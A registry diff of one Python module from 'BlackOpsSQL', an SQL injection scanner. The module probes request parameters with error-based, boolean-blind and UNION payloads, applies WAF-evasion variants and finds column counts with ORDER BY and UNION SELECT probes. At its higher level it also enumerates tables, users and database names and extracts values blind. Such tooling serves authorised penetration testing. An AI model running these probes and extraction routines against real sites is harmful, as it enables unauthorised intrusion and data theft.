blackops-sql 0.1.6__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,526 @@
1
+ # SPDX-License-Identifier: AGPL-3.0-or-later
2
+ # Copyright (c) 2026 CommonHuman-Lab
3
+ """
4
+ BlackOpsSQL — engine/_scanner/active/
5
+ Error-based, boolean-based, and union-based SQLi detection.
6
+
7
+ Sub-modules:
8
+ - _helpers : HTTP fetch helper and response comparison utilities
9
+
10
+ All detection logic (scan_param, _test_error_based, _test_boolean, _test_union,
11
+ _detect_db_error, _find_column_count) lives here in __init__.py so that
12
+ references can be patched by tests via the package namespace.
13
+ """
14
+ from __future__ import annotations
15
+
16
+ import re
17
+ from typing import Any, Dict, List, Optional, Tuple
18
+
19
+ from ...log import get_logger
20
+ from ...reporter import ErrorBasedFinding, BooleanFinding, UnionFinding, ExtractionFinding, ScanResult
21
+ from ...http.injector import Injector
22
+ from ...http.waf_detect import EVASION_NONE
23
+ from ..options import ScanOptions
24
+ from ..payloads import (
25
+ DB_ERROR_PATTERNS,
26
+ apply_evasion,
27
+ get_error_payloads,
28
+ get_boolean_pairs,
29
+ get_db_contents_payloads,
30
+ get_enum_payloads,
31
+ make_marker,
32
+ order_by_probes,
33
+ union_null_probes,
34
+ )
35
+ from ._helpers import (
36
+ _fetch,
37
+ _diff_score,
38
+ _len_ratio,
39
+ _has_stable_boolean_signal,
40
+ _extract_marker,
41
+ _is_path_reflected,
42
+ strip_status_sentinel,
43
+ _BOOL_CONFIRM_THRESHOLD,
44
+ _BOOL_LIKELY_THRESHOLD,
45
+ _BOOL_LEN_RATIO_THRESHOLD,
46
+ )
47
+
48
# Module-level logger shared by every detection routine in this package.
logger = get_logger("blackopssql.active")
49
+
50
+
51
+ # ---------------------------------------------------------------------------
52
+ # Public entry point
53
+ # ---------------------------------------------------------------------------
54
+
55
def scan_param(
    surface: Dict[str, Any],
    evasions: List[str],
    opts: ScanOptions,
    injector: Injector,
    result: ScanResult,
) -> None:
    """
    Test a single injectable surface for SQLi.

    surface keys: url, method, params, single_param (required);
    json_body, path_index (optional, defaulting to False and 0).

    Each evasion in *evasions* (or EVASION_NONE when the list is empty) is
    tried in order with the techniques enabled on *opts* (error, boolean,
    union).  Escalation stops at the first evasion under which any technique
    records a finding.  At level >= 3 with error detection enabled, an
    extended payload set (db_contents + enum) is additionally sent through
    the error channel.

    Findings are appended to *result*; nothing is returned.  If the baseline
    request fails (``_fetch`` returns None) the surface is skipped entirely.
    """
    url = surface["url"]
    method = surface["method"]
    params = surface["params"]
    param = surface["single_param"]
    json_body = surface.get("json_body", False)
    path_index = surface.get("path_index", 0)
    second_url = getattr(opts, "second_url", "")

    # Fetch a clean baseline using the original param value (not empty string),
    # so the baseline represents normal application behaviour for a valid input.
    baseline = _fetch(injector, url, method, params, param, None,
                      second_url=second_url, json_body=json_body, path_index=path_index)
    if baseline is None:
        return

    evasion_chain = evasions if evasions else [EVASION_NONE]

    _surface_error_found = False
    _surface_boolean_found = False
    _surface_union_found = False
    # Evasion under which a technique first recorded a finding (None if none did).
    _confirmed_evasion: Optional[str] = None

    for evasion in evasion_chain:
        if opts.use_error and not _surface_error_found:
            _before = len(result.error_based)
            _test_error_based(url, method, params, param, evasion, opts, injector, result,
                              second_url, json_body, path_index)
            _surface_error_found = len(result.error_based) > _before

        # Skip boolean if error or union already gave a definitive confirmation —
        # both are cheaper to detect and leave no ambiguity about injectability.
        _definitive_hit = _surface_error_found or _surface_union_found
        if opts.use_boolean and not _definitive_hit and not _surface_boolean_found:
            _before = len(result.boolean_based)
            _test_boolean(url, method, params, param, baseline, evasion, opts, injector, result,
                          second_url, json_body, path_index)
            _surface_boolean_found = len(result.boolean_based) > _before

        if opts.use_union and not _surface_union_found:
            _before = len(result.union_based)
            _test_union(url, method, params, param, evasion, opts, injector, result,
                        second_url, json_body, path_index)
            _surface_union_found = len(result.union_based) > _before

        # Stop escalating evasions as soon as any technique confirms injection.
        # Once injectable under one evasion, further WAF-bypass attempts are wasted.
        if _surface_error_found or _surface_boolean_found or _surface_union_found:
            _confirmed_evasion = evasion
            break

    # Level 3: run extended payload sets (db_contents + enum) via error channel
    if opts.level >= 3 and opts.use_error:
        # Reuse the evasion that actually confirmed injection: if the first
        # evasion produced nothing, sending the extended set through it again
        # is unlikely to get past whatever blocked the earlier probes.  Fall
        # back to the first evasion when nothing was confirmed.
        evasion = _confirmed_evasion if _confirmed_evasion is not None else evasion_chain[0]
        _dbms = result.dbms_detected or opts.dbms
        _extended = (
            get_db_contents_payloads(_dbms, "tables")
            + get_db_contents_payloads(_dbms, "columns")
            + get_enum_payloads("version")
            + get_enum_payloads("current_user")
            + get_enum_payloads("current_database")
        )
        for raw_payload in _extended:
            payload = apply_evasion(raw_payload, evasion)
            resp = _fetch(injector, url, method, params, param, payload,
                          second_url=second_url, json_body=json_body, path_index=path_index)
            if resp is None:
                continue
            # Remove the reflected payload (as sent, upper- and lower-cased) so
            # SQL keywords echoed back by the app are not mistaken for a DB error.
            _resp_l3 = resp
            for _v in (payload, payload.upper(), payload.lower()):
                _resp_l3 = _resp_l3.replace(_v, "")
            dbms_hit, evidence = _detect_db_error(_resp_l3)
            if dbms_hit:
                result.append_error_based(ErrorBasedFinding(
                    url=url, parameter=param, method=method,
                    payload=payload, dbms=dbms_hit, evidence=evidence,
                ))
138
+
139
+
140
+ # ---------------------------------------------------------------------------
141
+ # Error-based detection
142
+ # ---------------------------------------------------------------------------
143
+
144
def _detect_db_error(body: str) -> Tuple[str, str]:
    """
    Scan *body* for DB error patterns.

    The status sentinel is stripped first, then every pattern in
    DB_ERROR_PATTERNS is searched against the lowercased body, specific
    DBMS families before the "generic" bucket.

    Returns (dbms_name, evidence_snippet) for the first match, where the
    snippet spans roughly 30 characters before and 80 characters after the
    match, or ("", "") when nothing matches.
    """
    body = strip_status_sentinel(body)
    body_lower = body.lower()
    # str.lower() can lengthen text (e.g. U+0130 lowercases to two code
    # points), which would shift match offsets relative to the original body.
    # Lowercasing never shortens a string, so equal lengths mean offsets line
    # up one-to-one; otherwise slice the evidence from the lowercased text.
    snippet_source = body if len(body_lower) == len(body) else body_lower
    # Check specific DBMSes first, then generic
    for dbms in ("mysql", "mariadb", "mssql", "postgres", "sqlite", "oracle", "generic"):
        for pattern in DB_ERROR_PATTERNS[dbms]:
            m = re.search(pattern, body_lower)
            if m:
                start = max(0, m.start() - 30)
                end = min(len(snippet_source), m.end() + 80)
                return dbms, snippet_source[start:end].strip()
    return "", ""
160
+
161
+
162
def _test_error_based(
    url: str, method: str, params: Dict[str, str], param: str,
    evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
    second_url: str = "", json_body: bool = False, path_index: int = 0,
) -> None:
    """
    Probe *param* with error-provoking payloads and record the first hit.

    Each payload from ``get_error_payloads`` is passed through *evasion*,
    sent via ``_fetch``, and the response is scanned for DB error patterns.
    On the first match an ErrorBasedFinding is appended to *result*, the
    detected DBMS is stored on *result* (unless it is "generic" or a DBMS
    was already recorded), and the function returns.
    """
    for candidate in get_error_payloads(opts.dbms, opts.risk, opts.level):
        payload = apply_evasion(candidate, evasion)
        body = _fetch(injector, url, method, params, param, payload,
                      second_url=second_url, json_body=json_body, path_index=path_index)
        if body is None:
            continue

        # Apps that echo the payload inside their own error message
        # (e.g. "Invalid symbol: ' AND EXTRACTVALUE(...)") would otherwise
        # trip the DB error patterns, so drop the payload as sent as well
        # as its upper- and lower-cased forms before scanning.
        scrubbed = body
        for variant in (payload, payload.upper(), payload.lower()):
            scrubbed = scrubbed.replace(variant, "")

        dbms, evidence = _detect_db_error(scrubbed)
        if not dbms:
            continue

        logger.finding(
            "Error-based SQLi: %s param=%s payload=%s dbms=%s",
            url, param, payload, dbms,
        )
        finding = ErrorBasedFinding(
            url=url,
            parameter=param,
            method=method,
            payload=payload,
            dbms=dbms,
            evidence=evidence,
        )
        result.append_error_based(finding)

        # Remember the concrete DBMS for the rest of the scan.
        if result.dbms_detected is None and dbms != "generic":
            result.dbms_detected = dbms

        # A single confirmed finding per parameter is sufficient.
        return
201
+
202
+
203
+ # ---------------------------------------------------------------------------
204
+ # Boolean-based detection
205
+ # ---------------------------------------------------------------------------
206
+
207
def _test_boolean(
    url: str, method: str, params: Dict[str, str], param: str,
    baseline: str, evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
    second_url: str = "", json_body: bool = False, path_index: int = 0,
) -> None:
    """
    Probe *param* with TRUE/FALSE payload pairs and record the first hit.

    For each pair the two responses are compared with each other and with
    *baseline* (diff score, length ratio, stable-baseline signal).  The
    first pair judged "likely" produces a BooleanFinding on *result* and
    ends the test.  When that finding is confirmed and ``opts.level >= 3``,
    each extraction target is additionally read out through the boolean
    channel and stored as an ExtractionFinding.
    """
    for raw_true, raw_false in get_boolean_pairs(opts.risk, opts.level):
        payload_true = apply_evasion(raw_true, evasion)
        payload_false = apply_evasion(raw_false, evasion)

        resp_true = _fetch(injector, url, method, params, param, payload_true,
                           second_url=second_url, json_body=json_body, path_index=path_index)
        resp_false = _fetch(injector, url, method, params, param, payload_false,
                            second_url=second_url, json_body=json_body, path_index=path_index)
        if resp_true is None or resp_false is None:
            continue

        # TRUE-vs-FALSE divergence, and how far TRUE drifted from the baseline.
        score = _diff_score(resp_true, resp_false)
        baseline_score = _diff_score(baseline, resp_true)

        # Length divergence catches tiny textual differences.
        len_ratio = _len_ratio(resp_true, resp_false)
        baseline_len_ratio = _len_ratio(baseline, resp_true)

        # Signal reported by the helper from (baseline, TRUE, FALSE) responses.
        has_stable_signal = _has_stable_boolean_signal(baseline, resp_true, resp_false)

        stable_baseline = (
            baseline_score <= _BOOL_LIKELY_THRESHOLD
            and baseline_len_ratio <= _BOOL_LEN_RATIO_THRESHOLD
        )
        length_diverges = stable_baseline and len_ratio >= _BOOL_LEN_RATIO_THRESHOLD

        is_likely = score >= _BOOL_LIKELY_THRESHOLD or length_diverges or has_stable_signal
        # Only "likely" pairs are reported; anything else moves on to the next pair.
        if not is_likely:
            continue

        confirmed = (score >= _BOOL_CONFIRM_THRESHOLD
                     or (stable_baseline and len_ratio >= _BOOL_LEN_RATIO_THRESHOLD * 2)
                     or has_stable_signal)

        logger.finding(
            "Boolean SQLi: %s param=%s score=%.2f len_ratio=%.4f confirmed=%s",
            url, param, score, len_ratio, confirmed,
        )
        result.append_boolean(BooleanFinding(
            url=url,
            parameter=param,
            method=method,
            payload_true=payload_true,
            payload_false=payload_false,
            diff_score=score,
            confirmed=confirmed,
            evidence=strip_status_sentinel(resp_true)[:200],
        ))

        # Level 3: attempt data extraction via the boolean channel.
        if opts.level >= 3 and confirmed:
            # Imported lazily, only when extraction is actually attempted.
            from ..extract import extract_value, get_extraction_targets

            target_dbms = getattr(opts, "dbms", "auto")
            extraction_surface = {
                "url": url,
                "method": method,
                "params": params,
                "single_param": param,
                "json_body": json_body,
                "path_index": path_index,
            }
            for label, expr in get_extraction_targets(target_dbms):
                value = extract_value(
                    expr=expr,
                    surface=extraction_surface,
                    evasions=[evasion],
                    opts=opts,
                    injector=injector,
                    baseline=baseline,
                    mode="boolean",
                )
                if not value:
                    continue
                logger.finding("Extracted via boolean blind: %s param=%s %s=%s",
                               url, param, label, value)
                result.append_extraction(ExtractionFinding(
                    url=url, parameter=param, method=method,
                    expr=expr, value=value, mode="boolean",
                ))

        # One finding per parameter is enough.
        return
290
+
291
+
292
+ # ---------------------------------------------------------------------------
293
+ # Union-based detection
294
+ # ---------------------------------------------------------------------------
295
+
296
def _mask_marker_for_log(payload: str, marker: str) -> str:
    """Return *payload* with the probe marker and char(...) encodings masked for log output."""
    masked = payload
    if marker:
        # Mask the marker actually in use, whatever its prefix or letter case.
        masked = re.sub(re.escape(marker), "<marker>", masked, flags=re.IGNORECASE)
    # Legacy marker prefix, kept so previously masked payload shapes stay masked.
    masked = re.sub(r"BreachSQL_[A-Za-z0-9]+", "<marker>", masked, flags=re.IGNORECASE)
    # SQL function names are case-insensitive, so mask CHAR(...) as well as char(...).
    return re.sub(r"\bchar\(\d[\d,]+\)", "char(<marker>)", masked, flags=re.IGNORECASE)


def _test_union(
    url: str, method: str, params: Dict[str, str], param: str,
    evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
    second_url: str = "", json_body: bool = False, path_index: int = 0,
) -> None:
    """
    Probe *param* for UNION-based injection and record at most one finding.

    Step 1 determines the column count via ``_find_column_count`` (bounded by
    ``opts.max_union_cols``, default 20); without a column count the test
    ends.  Step 2 sends UNION probes carrying a marker and looks for that
    marker in the response (case-insensitively).  A reflected marker is
    rejected when the response also contains a DB error or when the marker
    appears to be a URL/path reflection.  If no probe reflects the marker but
    at least one response carries the HTTP-500 sentinel, the first such probe
    is reported instead.

    Findings are appended to *result*; nothing is returned.
    """
    # Step 1: find column count via ORDER BY
    max_cols = getattr(opts, "max_union_cols", 20)
    col_count = _find_column_count(url, method, params, param, evasion, injector,
                                   second_url, max_cols, json_body, path_index)
    if col_count is None:
        return

    # Step 2: find a reflected column
    marker = make_marker()
    _lite = (evasion == EVASION_NONE or evasion == "none")
    probes = union_null_probes(col_count, marker, lite=_lite)

    _first_http500_payload: Optional[str] = None  # best candidate for HTTP-500 signal

    for raw_payload in probes:
        payload = apply_evasion(raw_payload, evasion)
        resp = _fetch(injector, url, method, params, param, payload,
                      second_url=second_url, json_body=json_body, path_index=path_index)
        if resp is None:
            continue

        # Case-insensitive check: servers may uppercase the injected value (e.g. .upper() calls)
        _resp_lower = resp.lower()
        _marker_lower = marker.lower()
        if _marker_lower in _resp_lower:
            # Resolve the actual case form as it appears in the response.
            # Offsets from the lowercased text are only valid in the original
            # when lowercasing did not change its length; otherwise locate the
            # marker in the original text directly.
            if len(_resp_lower) == len(resp):
                _idx = _resp_lower.index(_marker_lower)
                found_marker = resp[_idx:_idx + len(marker)]
            else:
                _m = re.search(re.escape(marker), resp, re.IGNORECASE)
                found_marker = _m.group(0) if _m else marker
            # Guard 1: DB error reflection
            err_dbms, _ = _detect_db_error(resp)
            if err_dbms:
                logger.debug(
                    "Union probe: marker found but response also has DB error — "
                    "likely error-reflected payload, skipping param=%s payload=%s",
                    param, payload,
                )
                continue
            # Guard 2: URL/path reflection
            if _is_path_reflected(resp, found_marker, payload):
                logger.debug(
                    "Union probe: marker found but appears to be URL/path reflection, "
                    "skipping param=%s payload=%s",
                    param, payload,
                )
                continue
            logger.finding(
                "Union SQLi: %s param=%s cols=%d payload=%s",
                url, param, col_count, _mask_marker_for_log(payload, marker),
            )
            result.append_union(UnionFinding(
                url=url,
                parameter=param,
                method=method,
                payload=payload,
                column_count=col_count,
                extracted=_extract_marker(resp, found_marker),
            ))
            return

        # HTTP 500 from a UNION probe means the injection was executed but a
        # downstream template or type-cast crashed on the injected value.
        # Track the first such probe; report it only if no direct reflection is found.
        if "__HTTP_STATUS_500__" in resp and _first_http500_payload is None:
            _first_http500_payload = payload

    # No direct marker reflection found — fall back to HTTP-500 confirmation
    if _first_http500_payload is not None:
        logger.finding(
            "Union SQLi (HTTP 500 — template crash): %s param=%s cols=%d payload=%s",
            url, param, col_count, _mask_marker_for_log(_first_http500_payload, marker),
        )
        result.append_union(UnionFinding(
            url=url,
            parameter=param,
            method=method,
            payload=_first_http500_payload,
            column_count=col_count,
            extracted="[HTTP 500 — template crash on injected value]",
        ))
383
+
384
def _find_column_count(
    url: str, method: str, params: Dict[str, str], param: str,
    evasion: str, injector: Injector, second_url: str = "",
    max_cols: int = 20, json_body: bool = False, path_index: int = 0,
) -> Optional[int]:
    """Determine column count using ORDER BY N probes.

    Probes are grouped by their leading injection prefix.  For each prefix
    the first accepted response becomes the reference; a later probe is
    accepted when it shows no DB error and keeps at least 80% of the
    reference's words longer than four characters.  As soon as a probe with a
    larger N than the last accepted one fails for a prefix, N exceeds the real
    column count for that prefix ("overflow").

    DVWA-style apps return an empty body (no data rows) rather than a DB error
    when ORDER BY N exceeds the column count, so both cases are detected.

    If no ORDER BY probe succeeded, or every N up to *max_cols* succeeded
    (e.g. the app swallows DB errors), UNION SELECT probes with 1..max_cols
    columns are tried instead; the first N whose response reflects the probe
    marker or carries the HTTP-500 sentinel is returned.  A signal that is
    already present in the uninjected baseline is ignored, because it cannot
    be attributed to the injected payload.

    Returns the detected column count, or None when none was found.
    """
    _lite = (evasion == EVASION_NONE or evasion == "none")
    probes = order_by_probes(max_cols=max_cols, lite=_lite)
    last_ok: Optional[int] = None

    # Uninjected response; it gates the UNION fallback and tells us which
    # fallback signals are already present without any injection.
    baseline_resp = _fetch(injector, url, method, params, param, None,
                           second_url=second_url, json_body=json_body, path_index=path_index)

    def _significant_words(text: str) -> set:
        return {w for w in text.split() if len(w) > 4}

    # Per-prefix word set of the first accepted response — used as reference
    # when the payload changes the injection context.
    prefix_baseline: Dict[str, set] = {}
    prefix_last_ok: Dict[str, int] = {}
    prefix_overflow: set = set()

    def _get_prefix(payload: str) -> str:
        m2 = re.match(r"^(\d+|['\"]?\)*)", payload)
        return m2.group(1) if m2 else ""

    def _response_looks_good(resp: str, prefix: str) -> bool:
        ref_words = prefix_baseline.get(prefix)
        # No reference yet, or a reference without significant words: accept.
        if not ref_words:
            return True
        overlap = len(ref_words & _significant_words(resp)) / len(ref_words)
        return overlap >= 0.80

    for raw_payload in probes:
        m = re.search(r"ORDER BY (\d+)", raw_payload, re.IGNORECASE)
        if not m:
            continue
        n = int(m.group(1))
        prefix = _get_prefix(raw_payload)

        # This prefix already overflowed; larger N cannot add information.
        if prefix in prefix_overflow:
            continue

        payload = apply_evasion(raw_payload, evasion)
        resp = _fetch(injector, url, method, params, param, payload,
                      second_url=second_url, json_body=json_body, path_index=path_index)
        if resp is None:
            continue

        _, err_evidence = _detect_db_error(resp)
        looks_ok = not err_evidence and _response_looks_good(resp, prefix)

        if looks_ok:
            if prefix not in prefix_baseline:
                prefix_baseline[prefix] = _significant_words(resp)
            prefix_last_ok[prefix] = n
            last_ok = max(last_ok or 0, n) or None
        else:
            p_last = prefix_last_ok.get(prefix)
            if p_last is not None and n > p_last:
                prefix_overflow.add(prefix)

        # Early exit: once we have overflow confirmation for all seen prefixes
        # that have at least one OK probe, we have enough information.
        if prefix_overflow and all(p in prefix_overflow for p in prefix_baseline):
            break

    if prefix_overflow:
        best = max(
            (prefix_last_ok[p] for p in prefix_overflow if p in prefix_last_ok),
            default=None,
        )
        if best is not None:
            return best

    # Fallback: ORDER BY detection failed because the app swallows DB errors
    # (try/except around the query). Use UNION probes instead: when the column
    # count is correct the SQL is valid and the row is returned.
    if (last_ok is None or last_ok == max_cols) and baseline_resp is not None:
        _fb_marker = "BSCNT_PROBE"  # short, all-caps survives .upper() on the server
        _fb_marker_lower = _fb_marker.lower()
        # Three injection styles cover the common quoting contexts; exit on first hit.
        _fb_fmts = (
            "' UNION SELECT {}-- -",
            " UNION SELECT {}-- -",
            "0 UNION SELECT {}-- -",
        )
        # A signal the uninjected page already shows proves nothing about the probe.
        _marker_is_signal = _fb_marker_lower not in baseline_resp.lower()
        _http500_is_signal = "__HTTP_STATUS_500__" not in baseline_resp

        if _marker_is_signal or _http500_is_signal:
            for _n in range(1, max_cols + 1):
                _inner = ",".join([f"'{_fb_marker}'"] * _n)
                for _fmt in _fb_fmts:
                    _pl = apply_evasion(_fmt.format(_inner), evasion)
                    _resp = _fetch(injector, url, method, params, param, _pl,
                                   second_url=second_url, json_body=json_body,
                                   path_index=path_index)
                    if _resp is None:
                        continue
                    # Direct reflection: marker appears in rendered text
                    if _marker_is_signal and _fb_marker_lower in _resp.lower():
                        return _n
                    # Template crash: UNION was syntactically valid but a float-format
                    # Jinja filter blew up on a NULL/string value — still a hit.
                    if _http500_is_signal and "__HTTP_STATUS_500__" in _resp:
                        return _n
    return last_ok
507
+
508
# Names exposed through the package namespace.  Underscore-prefixed helpers
# and detection routines are listed deliberately so that tests can patch them
# via the package (see the module docstring).
__all__ = [
    "scan_param",
    # helpers
    "_fetch",
    "_diff_score",
    "_len_ratio",
    "_has_stable_boolean_signal",
    "_extract_marker",
    "_is_path_reflected",
    "strip_status_sentinel",
    # detection
    "_detect_db_error",
    "_test_error_based",
    "_test_boolean",
    "_test_union",
    "_find_column_count",
    # re-exported from payloads (for backward compat / patching)
    "make_marker",
]